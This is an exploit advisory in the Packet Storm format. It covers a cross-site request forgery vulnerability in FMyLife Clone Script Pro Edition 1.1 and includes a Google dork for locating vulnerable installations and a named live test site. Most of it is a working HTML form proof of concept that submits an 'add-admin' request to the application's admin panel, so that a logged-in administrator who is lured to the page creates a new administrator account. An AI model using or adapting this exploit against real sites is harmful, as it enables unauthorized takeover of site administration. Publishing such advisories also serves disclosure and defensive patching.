FMyLife Clone Script Pro Edition version 1.1 suffers from a cross site request forgery vulnerability.
ad0e9c092a3871d8ec62a0d3fb19eb9581acf2407105fac5294ebe33a52cdfd1# # # # #
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: https://alstrasoft.com/fmylife-pro.htm
# Tested on: https://www.tellaboutit.com/admin/
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: https://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/
# Author: Ihsan Sencan
# Author Web: https://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="https://localhost/[PATH]/admin/" method="post">
<div id="add-admin-form">
<input type="hidden" name="action" value="add-admin" />
<label for="username">Username:</label>
<input type="text" id="username" name="admin-username" value="" />
<div class="spacer"></div>
<label for="password">Password:</label>
<input type="password" id="password" name="admin-password" value="" />
<div class="spacer"></div>
<input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
</div>
</form>
</body>
</html>
# # # # #
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed